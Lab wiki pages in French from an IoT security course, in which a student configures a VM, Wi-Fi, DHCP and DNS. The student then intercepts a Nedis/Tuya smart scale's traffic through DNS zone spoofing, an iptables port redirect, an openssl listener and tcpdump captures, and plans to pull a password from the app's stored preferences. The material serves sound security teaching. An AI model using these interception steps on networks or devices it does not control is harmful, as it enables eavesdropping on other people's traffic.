On constate sur ces paquets la requête de la balance pour obtenir une IP, puis le moment ou elle l'obtient. A chaque fois qu'elle redémarre, elle vient récupérer une IP, elle n'aura donc pas forcement la 105.

[[Fichier:WS connection balance.png|sans_cadre|858x858px]]

Je peux donc ping ma balance depuis mon pc (celui qui host ma vm)

[[Fichier:PIng balance.png|sans_cadre]]

tcpdump -i eth1 -n port 53:<syntaxhighlight lang="linux-config">
14:46:51.115996 IP 172.16.10.105.49153 > 172.16.10.1.53: 13861+ A? m2.tuyaeu.com. (31)
14:46:51.125611 IP 172.16.10.1.53 > 172.16.10.105.49153: 13861 3/0/0 A 3.120.92.134, A 18.184.31.90, A 35.156.44.172 (79)
14:46:51.168250 IP 172.16.10.105.49153 > 172.16.10.1.53: 59035+ A? a3.tuyaeu.com. (31)
14:46:51.177967 IP 172.16.10.1.53 > 172.16.10.105.49153: 59035 3/0/0 A 18.198.62.99, A 18.158.227.228, A 3.67.116.46 (79)
14:46:51.703179 IP 172.16.10.102.57661 > 172.16.10.1.53: 30982+ AAAA? a1.tuyaeu.com. (31)
14:46:51.706085 IP 172.16.10.102.57662 > 172.16.10.1.53: 15654+ A? a1.tuyaeu.com. (31)
14:46:51.713159 IP 172.16.10.1.53 > 172.16.10.102.57661: 30982 3/0/0 AAAA 2a05:d014:afa:af02:262a:be09:e328:ff21, AAAA 2a05:d014:afa:af01:87dc:dc67:35a1:5bfe, AAAA 2a05:d014:afa:af00:1ee2:1f00:e061:e8bf (115)
14:46:51.715736 IP 172.16.10.1.53 > 172.16.10.102.57662: 15654 3/0/0 A 3.78.92.3, A 35.159.150.3, A 3.121.33.91 (79)

56 packets captured
56 packets received by filter
0 packets dropped by kernel
[4343449.827028] device eth1 left promiscuous mode

</syntaxhighlight>visiblement notre balance communque avec tuya via m2.tuyaeu.com et a3.tuyaeu.com

et la vm android a1.tuyaeu.com

tcpdump -i eth1 -n port 53: après avoir crée dns, site, etc a1.tuyaeu.com<syntaxhighlight lang="linux-config">
root@SE5:/etc/apache2/sites-available# tcpdump -i eth1 -n port 53
[5544865.540418] device eth1 entered promiscuous mode
tcpdump: verbose output suppressed, use -v[v]... for full protocol decode
listening on eth1, link-type EN10MB (Ethernet), snapshot length 262144 bytes
12:30:55.146437 IP 172.16.10.1.53 > 172.16.10.100.17620: 23156 5/0/0 CNAME reddit.map.fastly.net., A 151.101.129.140, A
151.101.1.140, A 151.101.65.140, A 151.101.193.140 (129)
12:30:55.168796 IP 172.16.10.1.53 > 172.16.10.100.24249: 64622 2/0/0 CNAME us-central1-gcp.api.sc-gw.com., A 35.190.43.
134 (109)
12:30:55.322498 IP 172.16.10.100.26394 > 172.16.10.1.53: 29420+ A? scontent-cdg4-1.xx.fbcdn.net. (46)
12:30:56.095075 IP 172.16.10.100.62675 > 172.16.10.1.53: 46396+ A? cf-st.sc-cdn.net. (34)
12:30:56.121796 IP 172.16.10.1.53 > 172.16.10.100.62675: 46396 1/0/0 A 3.163.248.4 (50)
12:30:56.539099 IP 172.16.10.1.53 > 172.16.10.100.26394: 29420 1/0/0 A 185.60.219.2 (62)
12:30:57.289763 IP 172.16.10.100.7071 > 172.16.10.1.53: 14247+ A? usc1-gcp-v62.api.snapchat.com. (47)
12:30:57.302767 IP 172.16.10.1.53 > 172.16.10.100.7071: 14247 2/0/0 CNAME usc1-gcp-v62.api.sc-gw.com., A 34.120.159.232
(103)
12:30:58.490060 IP 172.16.10.105.49153 > 172.16.10.1.53: 50294+ A? m2.tuyaeu.com. (31)
12:30:58.490174 IP 172.16.10.1.53 > 172.16.10.105.49153: 50294* 2/0/0 CNAME ns.tuyaeu.com., A 172.16.10.1 (64)
12:30:58.540041 IP 172.16.10.105.49153 > 172.16.10.1.53: 23785+ A? a3.tuyaeu.com. (31)
12:30:58.540132 IP 172.16.10.1.53 > 172.16.10.105.49153: 23785* 2/0/0 CNAME ns.tuyaeu.com., A 172.16.10.1 (64)
12:31:00.979103 IP 172.16.10.100.63625 > 172.16.10.1.53: 63574+ A? gql-fed.reddit.com. (36)
12:31:00.997721 IP 172.16.10.1.53 > 172.16.10.100.63625: 63574 5/0/0 CNAME reddit.map.fastly.net., A 151.101.65.140, A
151.101.129.140, A 151.101.193.140, A 151.101.1.140 (135)
12:31:04.461507 IP 172.16.10.102.63971 > 172.16.10.1.53: 20792+ A? discord.com. (29)
12:31:04.461519 IP 172.16.10.102.54572 > 172.16.10.1.53: 15444+ Type65? discord.com. (29)
12:31:04.493098 IP 172.16.10.1.53 > 172.16.10.102.63971: 20792 5/0/0 A 162.159.138.232, A 162.159.136.232, A 162.159.12
8.233, A 162.159.135.232, A 162.159.137.232 (109)
12:31:04.493306 IP 172.16.10.1.53 > 172.16.10.102.54572: 15444 1/0/5 Type65 (158)
18 packets captured
18 packets received by filter
0 packets dropped by kernel

</syntaxhighlight>tcpdump -i eth1 host 172.16.10.105 and not port 53 -A<syntaxhighlight lang="linux-config">
tcpdump: verbose output suppressed, use -v[v]... for full protocol decode
listening on eth1, link-type EN10MB (Ethernet), snapshot length 262144 bytes
12:36:41.148741 IP 172.16.10.0.bootps > 172.16.10.105.bootpc: BOOTP/DHCP, Reply, length 300
E..H..........
...
i.C.D.4......<\)...........
i..........|.-L........................................................................................................
..................................................................................................c.Sc5..6...
.3....X..........
.....
.. plil.info................
12:36:41.161323 IP 172.16.10.0.bootps > 172.16.10.105.bootpc: BOOTP/DHCP, Reply, length 300
E..H..........
...
i.C.D.4g.....[.}T..........
i..........|.-L........................................................................................................
..................................................................................................c.Sc5..6...
.3....X..........
.....
.. plil.info................
12:36:41.167616 ARP, Request who-has 172.16.10.105 tell 0.0.0.0, length 46
..........|.-L............
i....P....Y...c....
12:36:41.490919 ARP, Request who-has 172.16.10.105 tell 0.0.0.0, length 46
..........|.-L............
i.r.u....).........
12:36:41.993612 ARP, Request who-has 172.16.10.105 tell 172.16.10.105, length 46
..........|.-L..
i........
i..HE.....f........
12:36:42.011664 ARP, Request who-has 172.16.10.1 tell 172.16.10.105, length 46
..........|.-L..
i........
.....up. ..........
12:36:42.011672 ARP, Reply 172.16.10.1 is-at 00:16:3e:23:74:42 (oui Unknown), length 28
..........>#tB..
...|.-L..
i
12:36:42.019053 IP 172.16.10.105.3872 > 172.16.10.1.8886: Flags [S], seq 6509, win 4380, options [mss 1460], length 0
E..,......O>..
i..
.. "....m....`....<........
12:36:42.019100 IP 172.16.10.1.8886 > 172.16.10.105.3872: Flags [R.], seq 0, ack 6510, win 0, length 0
E..(..@.@..E..
...
i".. .......nP.......
12:36:42.070419 IP 172.16.10.105.17034 > 172.16.10.1.https: Flags [S], seq 6509, win 4380, options [mss 1460], length 0
E..,......O<..
i..
.B......m....`...........<.
12:36:42.070442 IP 172.16.10.1.https > 172.16.10.105.17034: Flags [S.], seq 3767910189, ack 6510, win 64240, options [m
ss 1460], length 0
E..,..@.@..A..
...
i..B....-...n`...l.......
12:36:42.077437 IP 172.16.10.105.17034 > 172.16.10.1.https: Flags [.], ack 1, win 4380, length 0
E..(......O?..
i..
.B......n....P...4......
..
12:36:42.079986 IP 172.16.10.105.17034 > 172.16.10.1.https: Flags [P.], seq 1:68, ack 1, win 4380, length 67
E..k......N...
i..
.B......n....P...........>...:..BAohBAohbmd6aG91IFR1eVjaG5vbG9SB........................
12:36:42.080012 IP 172.16.10.1.https > 172.16.10.105.17034: Flags [.], ack 68, win 64173, length 0
E..(..@.@.....
...
i..B.........P...l...
12:36:42.080447 IP 172.16.10.1.https > 172.16.10.105.17034: Flags [P.], seq 1:8, ack 68, win 64173, length 7
E../..@.@.....
...
i..B.........P...l.........(
12:36:42.080533 IP 172.16.10.1.https > 172.16.10.105.17034: Flags [F.], seq 8, ack 68, win 64173, length 0
E..(..@.@.....
...
i..B....5....P...l...
12:36:42.101652 IP 172.16.10.105.17034 > 172.16.10.1.https: Flags [.], ack 8, win 4373, length 0
E..(. ....O<..
i..
.B..........5P...4s........
12:36:42.102116 IP 172.16.10.105.17034 > 172.16.10.1.https: Flags [R.], seq 68, ack 8, win 4380, length 0
E..(.
....O;..
i..
.B..........5P...4h.....
..
12:36:43.025368 IP 172.16.10.105.23869 > 172.16.10.1.8886: Flags [S], seq 6511, win 4380, options [mss 1460], length 0
E..,......O6..
i..
.]="....o....`............9
12:36:43.025387 IP 172.16.10.1.8886 > 172.16.10.105.23869: Flags [R.], seq 0, ack 6512, win 0, length 0
E..(..@.@..E..
...
i".]=.......pP.......
12:36:44.025225 IP 172.16.10.105.22317 > 172.16.10.1.8886: Flags [S], seq 6513, win 4380, options [mss 1460], length 0
E..,......O5..
i..
.W-"....q....`....+........
12:36:44.025269 IP 172.16.10.1.8886 > 172.16.10.105.22317: Flags [R.], seq 0, ack 6514, win 0, length 0
E..(..@.@..E..
...
i".W-.......rP.......
12:36:45.025301 IP 172.16.10.105.31465 > 172.16.10.1.8886: Flags [S], seq 6517, win 4380, options [mss 1460], length 0
E..,......O4..
i..
.z."....u....`...ck......E.
12:36:45.025318 IP 172.16.10.1.8886 > 172.16.10.105.31465: Flags [R.], seq 0, ack 6518, win 0, length 0
E..(..@.@..E..
...
i".z........vP....0..
12:36:46.025500 IP 172.16.10.105.9070 > 172.16.10.1.8886: Flags [S], seq 6521, win 4380, options [mss 1460], length 0
E..,......O3..
i..
.#n"....y....`.............
12:36:46.025517 IP 172.16.10.1.8886 > 172.16.10.105.9070: Flags [R.], seq 0, ack 6522, win 0, length 0
E..(..@.@..E..
...
i".#n.......zP.......
12:36:47.033189 IP 172.16.10.105.51179 > 172.16.10.1.8886: Flags [S], seq 6527, win 4380, options [mss 1460], length 0
E..,......O2..
i..
...".........`...._......y.
12:36:47.033206 IP 172.16.10.1.8886 > 172.16.10.105.51179: Flags [R.], seq 0, ack 6528, win 0, length 0
E..(..@.@..E..
...
i"...........P...?$..
12:36:47.263020 ARP, Request who-has 172.16.10.105 tell 172.16.10.1, length 28
..........>#tB..
.........
i
12:36:48.287049 ARP, Request who-has 172.16.10.105 tell 172.16.10.1, length 28
..........>#tB..
.........
i
12:36:48.653641 IP 172.16.10.0.bootps > 172.16.10.105.bootpc: BOOTP/DHCP, Reply, length 300
E..H..........
...
i.C.D.4B...................
i..........|.-L........................................................................................................
..................................................................................................c.Sc5..6...
.3....Q..........
.....
.. plil.info................
12:36:48.663352 IP 172.16.10.0.bootps > 172.16.10.105.bootpc: BOOTP/DHCP, Reply, length 300
E..H..........
...
i.C.D.4.L.......p..........
i..........|.-L........................................................................................................
..................................................................................................c.Sc5..6...
.3....Q..........
.....
.. plil.info................
12:36:48.674677 ARP, Request who-has 172.16.10.105 tell 0.0.0.0, length 46
..........|.-L............
i>#tB./..P.........
12:36:48.993649 ARP, Request who-has 172.16.10.105 tell 0.0.0.0, length 46
..........|.-L............
ir...P.............
12:36:49.311055 ARP, Request who-has 172.16.10.105 tell 172.16.10.1, length 28
..........>#tB..
.........
i
12:36:49.490922 ARP, Request who-has 172.16.10.105 tell 172.16.10.105, length 46
..........|.-L..
i........
i.......x....D.....
12:36:49.492262 ARP, Reply 172.16.10.105 is-at a4:e5:7c:16:2d:4c (oui Unknown), length 46
..........|.-L..
i..>#tB..
...................
12:36:49.515651 IP 172.16.10.105.29415 > 172.16.10.1.8886: Flags [S], seq 6536, win 4380, options [mss 1460], length 0
E..,......O...
i..
.r.".........`...kZ........
12:36:49.515669 IP 172.16.10.1.8886 > 172.16.10.105.29415: Flags [R.], seq 0, ack 6537, win 0, length 0
E..(..@.@..E..
...
i".r.........P.......
12:36:49.518628 IP 172.16.10.105.31325 > 172.16.10.1.https: Flags [S], seq 6539, win 4380, options [mss 1460], length 0
E..,......O-..
i..
.z]..........`.............
12:36:49.518648 IP 172.16.10.1.https > 172.16.10.105.31325: Flags [S.], seq 1378912894, ack 6540, win 64240, options [m
ss 1460], length 0
E..,..@.@..A..
...
i..z]R0.~....`...l.......
12:36:49.523505 IP 172.16.10.105.31325 > 172.16.10.1.https: Flags [.], ack 1, win 4380, length 0
E..(......O0..
i..
.z]......R0..P........a3.tu
12:36:49.527055 IP 172.16.10.105.31325 > 172.16.10.1.https: Flags [P.], seq 1:68, ack 1, win 4380, length 67
E..k......N...
i..
.z]......R0..P...G?......>...:..BAohBAohbmd6aG91IFR1eVjaG5vbG9SB........................
12:36:49.527081 IP 172.16.10.1.https > 172.16.10.105.31325: Flags [.], ack 68, win 64173, length 0
E..(..@.@..X..
...
i..z]R0......P...l...
12:36:49.527462 IP 172.16.10.1.https > 172.16.10.105.31325: Flags [P.], seq 1:8, ack 68, win 64173, length 7
E../..@.@..P..
...
i..z]R0......P...l.........(
12:36:49.527530 IP 172.16.10.1.https > 172.16.10.105.31325: Flags [F.], seq 8, ack 68, win 64173, length 0
E..(..@.@..V..
...
i..z]R0......P...l...
12:36:49.569636 IP 172.16.10.105.31325 > 172.16.10.1.https: Flags [.], ack 8, win 4373, length 0
E..(......O...
i..
.z]......R0..P..........C.@
12:36:49.574893 IP 172.16.10.105.31325 > 172.16.10.1.https: Flags [R.], seq 68, ack 8, win 4380, length 0
E..(......O-..
i..
.z]......R0..P..........
..
12:36:50.310055 ARP, Request who-has 172.16.10.105 tell 172.16.10.105, length 46
..........|.-L..
i........
i........ ....>....
12:36:53.526624 IP 172.16.10.105.48314 > 172.16.10.1.8886: Flags [S], seq 6547, win 4380, options [mss 1460], length 0
E..,......O&..
i..
...".........`...!|........
12:36:53.526669 IP 172.16.10.1.8886 > 172.16.10.105.48314: Flags [R.], seq 0, ack 6548, win 0, length 0
E..(..@.@..E..
...
i"...........P...JA..
12:36:54.536817 IP 172.16.10.105.44185 > 172.16.10.1.8886: Flags [S], seq 6567, win 4380, options [mss 1460], length 0
E..,......O%..
i..
...".........`...1.........
12:36:54.536835 IP 172.16.10.1.8886 > 172.16.10.105.44185: Flags [R.], seq 0, ack 6568, win 0, length 0
E..(..@.@..E..
...
i"...........P...ZN..
12:36:55.545631 IP 172.16.10.105.26626 > 172.16.10.1.8886: Flags [S], seq 6589, win 4380, options [mss 1460], length 0
E..,......O$..
i..
.h.".........`...v
........
12:36:55.545649 IP 172.16.10.1.8886 > 172.16.10.105.26626: Flags [R.], seq 0, ack 6590, win 0, length 0
E..(..@.@..E..
...
i".h.........P.......
12:36:56.554680 IP 172.16.10.105.16244 > 172.16.10.1.8886: Flags [S], seq 6611, win 4380, options [mss 1460], length 0
E..,......O#..
i..
.?t".........`.............
12:36:56.554698 IP 172.16.10.1.8886 > 172.16.10.105.16244: Flags [R.], seq 0, ack 6612, win 0, length 0
E..(..@.@..E..
...
i".?t........P....G..
^C
57 packets captured
57 packets received by filter
0 packets dropped by kernel
</syntaxhighlight>port 8886 chez tuya ?

<syntaxhighlight lang="linux-config">
root@SE5:/etc/apache2/sites-available# openssl s_server -accept 8886 -cert /etc/ssl/apache/ca.crt -key /etc/ssl/apache/ca.key -debug
Using default temp DH parameters
ACCEPT
read from 0x55b0357c45c0 [0x55b0357db203] (5 bytes => 5 (0x5))
0000 - 16 03 03 00 3e ....>
read from 0x55b0357c45c0 [0x55b0357db208] (62 bytes => 62 (0x3E))
0000 - 01 00 00 3a 03 03 42 41-6f 68 42 41 6f 68 62 6d ...:..BAohBAohbm
0010 - 64 36 61 47 39 31 49 46-52 31 65 56 6a 61 47 35 d6aG91IFR1eVjaG5
0020 - 76 62 47 39 53 42 00 00-04 00 ae 00 ff 01 00 00 vbG9SB..........
0030 - 0d 00 01 00 01 02 00 16-00 00 00 17 00 00 ..............
write to 0x55b0357c45c0 [0x55b0357e4430] (7 bytes => 7 (0x7))
0000 - 15 03 03 00 02 02 28 ......(
ERROR
801B7259B87F0000:error:0A0000C1:SSL routines:tls_post_process_client_hello:no shared cipher:../ssl/statem/statem_srvr.c:2220:
shutting down SSL
CONNECTION CLOSED
read from 0x55b0357c2410 [0x55b0357db203] (5 bytes => 5 (0x5))
0000 - 16 03 03 00 3e ....>
read from 0x55b0357c2410 [0x55b0357db208] (62 bytes => 62 (0x3E))
0000 - 01 00 00 3a 03 03 42 41-6f 68 42 41 6f 68 62 6d ...:..BAohBAohbm
0010 - 64 36 61 47 39 31 49 46-52 31 65 56 6a 61 47 35 d6aG91IFR1eVjaG5
0020 - 76 62 47 39 53 42 00 00-04 00 ae 00 ff 01 00 00 vbG9SB..........
0030 - 0d 00 01 00 01 02 00 16-00 00 00 17 00 00 ..............
write to 0x55b0357c2410 [0x55b0357e4430] (7 bytes => 7 (0x7))
0000 - 15 03 03 00 02 02 28 ......(
ERROR
801B7259B87F0000:error:0A0000C1:SSL routines:tls_post_process_client_hello:no shared cipher:../ssl/statem/statem_srvr.c:2220:
shutting down SSL
CONNECTION CLOSED
read from 0x55b0357c1930 [0x55b0357db203] (5 bytes => 5 (0x5))
0000 - 16 03 03 00 3e ....>
read from 0x55b0357c1930 [0x55b0357db208] (62 bytes => 62 (0x3E))
0000 - 01 00 00 3a 03 03 42 41-6f 68 42 41 6f 68 62 6d ...:..BAohBAohbm
0010 - 64 36 61 47 39 31 49 46-52 31 65 56 6a 61 47 35 d6aG91IFR1eVjaG5
0020 - 76 62 47 39 53 42 00 00-04 00 ae 00 ff 01 00 00 vbG9SB..........
0030 - 0d 00 01 00 01 02 00 16-00 00 00 17 00 00 ..............
write to 0x55b0357c1930 [0x55b0357e4430] (7 bytes => 7 (0x7))
0000 - 15 03 03 00 02 02 28 ......(
ERROR
801B7259B87F0000:error:0A0000C1:SSL routines:tls_post_process_client_hello:no shared cipher:../ssl/statem/statem_srvr.c:2220:
shutting down SSL
CONNECTION CLOSED
read from 0x55b0357c45c0 [0x55b0357db203] (5 bytes => 5 (0x5))
0000 - 16 03 03 00 3e ....>
read from 0x55b0357c45c0 [0x55b0357db208] (62 bytes => 62 (0x3E))
0000 - 01 00 00 3a 03 03 42 41-6f 68 42 41 6f 68 62 6d ...:..BAohBAohbm
0010 - 64 36 61 47 39 31 49 46-52 31 65 56 00 00 00 00 d6aG91IFR1eV....
0020 - 00 00 00 00 00 00 00 00-04 00 ae 00 ff 01 00 00 ................
0030 - 0d 00 01 00 01 02 00 16-00 00 00 17 00 00 ..............
write to 0x55b0357c45c0 [0x55b0357e4430] (7 bytes => 7 (0x7))
0000 - 15 03 03 00 02 02 28 ......(
ERROR
801B7259B87F0000:error:0A0000C1:SSL routines:tls_post_process_client_hello:no shared cipher:../ssl/statem/statem_srvr.c:2220:
shutting down SSL
CONNECTION CLOSED
read from 0x55b0357c2410 [0x55b0357db203] (5 bytes => 5 (0x5))
0000 - 16 03 03 00 3e ....>
read from 0x55b0357c2410 [0x55b0357db208] (62 bytes => 62 (0x3E))
0000 - 01 00 00 3a 03 03 42 41-6f 68 42 41 6f 68 62 00 ...:..BAohBAohb.
0010 - 00 00 00 00 00 00 00 00-00 00 00 00 00 00 00 00 ................
0020 - 00 00 00 00 00 00 00 00-04 00 ae 00 ff 01 00 00 ................
0030 - 0d 00 01 00 01 02 00 16-00 00 00 17 00 00 ..............
write to 0x55b0357c2410 [0x55b0357e4430] (7 bytes => 7 (0x7))
0000 - 15 03 03 00 02 02 28 ......(
ERROR
801B7259B87F0000:error:0A0000C1:SSL routines:tls_post_process_client_hello:no shared cipher:../ssl/statem/statem_srvr.c:2220:
shutting down SSL
CONNECTION CLOSED
read from 0x55b0357c1930 [0x55b0357db203] (5 bytes => 5 (0x5))
0000 - 16 03 03 00 3e ....>
read from 0x55b0357c1930 [0x55b0357db208] (62 bytes => 62 (0x3E))
0000 - 01 00 00 3a 03 03 42 41-6f 68 42 41 6f 68 62 6d ...:..BAohBAohbm
0010 - 64 36 61 47 39 31 49 46-52 31 65 56 6a 61 47 35 d6aG91IFR1eVjaG5
0020 - 76 62 47 39 53 42 00 00-04 00 ae 00 ff 01 00 00 vbG9SB..........
0030 - 0d 00 01 00 01 02 00 16-00 00 00 17 00 00 ..............
write to 0x55b0357c1930 [0x55b0357e4430] (7 bytes => 7 (0x7))
0000 - 15 03 03 00 02 02 28 ......(
ERROR
801B7259B87F0000:error:0A0000C1:SSL routines:tls_post_process_client_hello:no shared cipher:../ssl/statem/statem_srvr.c:2220:
shutting down SSL
CONNECTION CLOSED
read from 0x55b0357c45c0 [0x55b0357db203] (5 bytes => 5 (0x5))
0000 - 16 03 03 00 3e ....>
read from 0x55b0357c45c0 [0x55b0357db208] (62 bytes => 62 (0x3E))
0000 - 01 00 00 3a 03 03 42 41-6f 68 42 41 6f 68 62 6d ...:..BAohBAohbm
0010 - 64 36 61 47 39 31 49 46-52 31 65 56 6a 61 47 35 d6aG91IFR1eVjaG5
0020 - 76 62 47 39 53 42 00 00-04 00 ae 00 ff 01 00 00 vbG9SB..........
0030 - 0d 00 01 00 01 02 00 16-00 00 00 17 00 00 ..............
write to 0x55b0357c45c0 [0x55b0357e4430] (7 bytes => 7 (0x7))
0000 - 15 03 03 00 02 02 28 ......(
ERROR
801B7259B87F0000:error:0A0000C1:SSL routines:tls_post_process_client_hello:no shared cipher:../ssl/statem/statem_srvr.c:2220:
shutting down SSL
CONNECTION CLOSED
read from 0x55b0357c2410 [0x55b0357db203] (5 bytes => 5 (0x5))
0000 - 16 03 03 00 3e ....>
read from 0x55b0357c2410 [0x55b0357db208] (62 bytes => 62 (0x3E))
0000 - 01 00 00 3a 03 03 42 41-6f 68 42 41 6f 68 62 6d ...:..BAohBAohbm
0010 - 64 36 61 47 00 00 00 00-00 00 00 00 00 00 00 00 d6aG............
0020 - 00 00 00 00 00 00 00 00-04 00 ae 00 ff 01 00 00 ................
0030 - 0d 00 01 00 01 02 00 16-00 00 00 17 00 00 ..............
write to 0x55b0357c2410 [0x55b0357e4430] (7 bytes => 7 (0x7))
0000 - 15 03 03 00 02 02 28 ......(
ERROR
801B7259B87F0000:error:0A0000C1:SSL routines:tls_post_process_client_hello:no shared cipher:../ssl/statem/statem_srvr.c:2220:
shutting down SSL
CONNECTION CLOSED
read from 0x55b0357c1930 [0x55b0357db203] (5 bytes => 5 (0x5))
0000 - 16 03 03 00 3e ....>
read from 0x55b0357c1930 [0x55b0357db208] (62 bytes => 62 (0x3E))
0000 - 01 00 00 3a 03 03 42 41-6f 68 42 41 6f 68 62 6d ...:..BAohBAohbm
0010 - 64 36 61 47 39 31 49 46-52 31 65 56 6a 61 47 35 d6aG91IFR1eVjaG5
0020 - 76 62 47 39 53 42 00 00-04 00 ae 00 ff 01 00 00 vbG9SB..........
0030 - 0d 00 01 00 01 02 00 16-00 00 00 17 00 00 ..............
write to 0x55b0357c1930 [0x55b0357e4430] (7 bytes => 7 (0x7))
0000 - 15 03 03 00 02 02 28 ......(
ERROR
801B7259B87F0000:error:0A0000C1:SSL routines:tls_post_process_client_hello:no shared cipher:../ssl/statem/statem_srvr.c:2220:
shutting down SSL
CONNECTION CLOSED
</syntaxhighlight>trouver un mdp dans l'appli nedis /data/data/com.nedis.smartlife/shared_prefs

SE5 IdO sécurité des objets 2025/2026 b1

2025-12-02T15:16:59Z

Vdetrez : /* Nedis Wi-Fi Smart Personal Scales */

[[Fichier:1107px-Titre page.png|sans_cadre|820x820px]]

= Serveur virtuel (17/09) =
Dans un premier temps, on vient créer un serveur virtuel sur <code>capbreton</code> avec la commande <code>xen-create-image --hostname=SE5.vdetrez --dhcp --dir=/usr/local/xen --size=10G --memory=2G --dist=daedalus --bridge=bridgeStudents</code>

Ensuite, sur capbreton dans le dossier <code>/etc/network/interfaces.d</code> on vient créer un fichier <code>g1_vdetrez</code> pour mettre en place une nouvelle interface dans le VLAN 410. <syntaxhighlight lang="linux-config">
auto Trunk.410
iface Trunk.410 inet manual
vlan-raw-device Trunk
up ip link set $IFACE up
down ip link set $IFACE down

auto g1_vdetrez
iface g1_vdetrez inet manual
bridge_ports Trunk.410
up ip link set $IFACE up
down ip link set $IFACE down

</syntaxhighlight>

On a maintenant accès à la machine SE5.vdetrez (en ayant évidemment fait l'erreur de mettre "." à la place de "-") et on vient y configurer nos adresses IPv4.

Mon adresse IPv4 routée est la <code>172.26.145.100</code> et mon IPv4 dans le VLAN 410 est <code>172.16.10.0</code> <syntaxhighlight lang="linux-config">
# This file describes the network interfaces available on your system
# and how to activate them. For more information, see interfaces(5).

# The loopback network interface
auto lo
iface lo inet loopback

# The primary network interface
auto eth0
iface eth0 inet static
address 172.26.145.110
netmask 255.255.255.0
gateway 172.26.145.251
# post-up ethtool -K eth0 tx off

auto eth1
iface eth1 inet static
address 172.16.10.0/24
#
# The commented out line above will disable TCP checksumming which
# might resolve problems for some users. It is disabled by default
#

</syntaxhighlight>

On vérifie avec la commande <code>ip a</code><syntaxhighlight lang="linux-config">
1: lo: <LOOPBACK,UP,LOWER_UP> mtu 65536 qdisc noqueue state UNKNOWN group default qlen 1000
link/loopback 00:00:00:00:00:00 brd 00:00:00:00:00:00
inet 127.0.0.1/8 scope host lo
valid_lft forever preferred_lft forever
inet6 ::1/128 scope host
valid_lft forever preferred_lft forever
2: eth0: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 1500 qdisc pfifo_fast state UP group default qlen 1000
link/ether 00:16:3e:23:74:41 brd ff:ff:ff:ff:ff:ff
inet 172.26.145.110/24 brd 172.26.145.255 scope global eth0
valid_lft forever preferred_lft forever
inet6 2001:660:4401:6050:216:3eff:fe23:7441/64 scope global dynamic mngtmpaddr
valid_lft 853sec preferred_lft 753sec
inet6 2a01:c916:2047:c850:216:3eff:fe23:7441/64 scope global dynamic mngtmpaddr
valid_lft 2591853sec preferred_lft 604653sec
inet6 fe80::216:3eff:fe23:7441/64 scope link
valid_lft forever preferred_lft forever
3: eth1: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 1500 qdisc pfifo_fast state UP group default qlen 1000
link/ether 00:16:3e:23:74:42 brd ff:ff:ff:ff:ff:ff
inet 172.16.10.0/24 brd 172.16.10.255 scope global eth1
valid_lft forever preferred_lft forever
inet6 fe80::216:3eff:fe23:7442/64 scope link
valid_lft forever preferred_lft forever

</syntaxhighlight>

Et on constate que notre serveur a accès à Internet avec la commande <code>ping 8.8.8.8</code>

= Point d'accès WiFi (29/09) =
Pour l'instant, nous mettons de côté ce point du TP car il n'est pas utile pour la suite.

= Sécurisation WiFi par WPA2-PSK =

Pour communiquer avec le routeur <code>Cisco</code>, on branche le port série en USB et on se connecte avec la commande <code>minicom -D /dev/ttyUSB0 -b 9600</code>. La première étape fut la création du SSID <code>SE5-SSID10</code>.<syntaxhighlight lang="linux-config">
dot11 ssid SE5-SSID10

vlan 410

authentication open

authentication key-management wpa version 2

wpa-psk ascii Cisco2025

exit
</syntaxhighlight>
Puis, on configure l'interface <code>Dot11Radio0</code><syntaxhighlight lang="linux-config">
interface dot11radio 0

encryption mode ciphers aes-ccm

ssid SE5-SSID10

station-role root

no shutdown
</syntaxhighlight>Après cela, on retourne sur notre serveur virtuel et on y implémente un serveur DHCP pour l'attribution des IP aux machines se connectant sur le routeur. On retrouve cette configuration dans <code>/etc/dhcp/dhcpd.conf</code><syntaxhighlight lang="linux-config">
# dhcpd.conf

option domain-name "plil.info";
option domain-name-servers ns.plil.info;

default-lease-time 600;
max-lease-time 7200;

ddns-update-style none;

authoritative;

subnet 172.16.10.0 netmask 255.255.255.0 {
range 172.16.10.100 172.16.10.200;
option domain-name-servers 172.16.10.1;
option routers 172.16.10.1;
default-lease-time 600;
max-lease-time 7200;
}
</syntaxhighlight>Puis, on implémente un serveur DNS minimal dans le fichier <code>/etc/bind/named.conf.options</code><syntaxhighlight lang="linux-config">
options {
directory "/var/cache/bind";

recursion yes;
allow-query {172.16.10.0/24; 127.0.0.1;};

forwarders {
8.8.8.8;
1.1.1.1;
};

dnssec-validation auto;

listen-on {127.0.0.1; 172.16.10.1;};
listen-on-v6 { none; };
};
</syntaxhighlight>Et enfin, on met en place une mascarade entre le VLAN 410 et le routeur du réseau des salles de projets pour donner l'accès à Internet.<syntaxhighlight lang="linux-config">
Chain PREROUTING (policy ACCEPT 0 packets, 0 bytes)
pkts bytes target prot opt in out source destination

Chain INPUT (policy ACCEPT 0 packets, 0 bytes)
pkts bytes target prot opt in out source destination

Chain OUTPUT (policy ACCEPT 0 packets, 0 bytes)
pkts bytes target prot opt in out source destination

Chain POSTROUTING (policy ACCEPT 0 packets, 0 bytes)
pkts bytes target prot opt in out source destination
385 133K MASQUERADE 0 -- * eth0 172.16.10.0/24 0.0.0.0/0
0 0 MASQUERADE 0 -- * eth0 172.16.10.0/24 0.0.0.0/0
</syntaxhighlight>

= Interception de flux (30/09) =

== Redirection par DNS ==
Pour cette partie, on va ajouter une zone primaire à notre serveur DNS avec le nom Internet du site que l'on veut rediriger vers notre machine.

Ici, ce sera le merveilleux <code>moodle.com</code>

D'abord, on modifie <code>/etc/bind/named.conf.local</code><syntaxhighlight lang="linux-config">
//
// Do any local configuration here
//

// Consider adding the 1918 zones here, if they are not used in your
// organization
//include "/etc/bind/zones.rfc1918";

zone "moodle.com" {
type master;
file "/etc/bind/db.moodle.com";
};
</syntaxhighlight>Puis, on crée la fameuse zone <code>db.moodle.com</code> dans le même répertoire <syntaxhighlight lang="linux-config">
$TTL 200
@ IN SOA ns.moodle.com. admin.moodle.com. (
5 ;
3600 ;
1800 ;
604800 ;
86400 ;
)
IN NS ns.moodle.com.
ns IN A 172.16.10.1
@ IN A 172.16.10.1
www IN CNAME ns
</syntaxhighlight>Pour vérifier si notre configuration est correcte, on exécute ces deux commandes :

<code>sudo named-checkconf</code>

<code>sudo named-checkzone moodle.com /etc/bind/db.moodle.com</code>

== Redirection réseau ==
Dans cette partie, on ajoute une règle <code>iptables</code> pour rediriger le flux TCP vers un port local, le <code>8080</code>.

<code>iptables -t nat -A PREROUTING -i eth0 -p tcp --dport 80 -j REDIRECT --to-ports 8080</code><syntaxhighlight lang="linux-config">
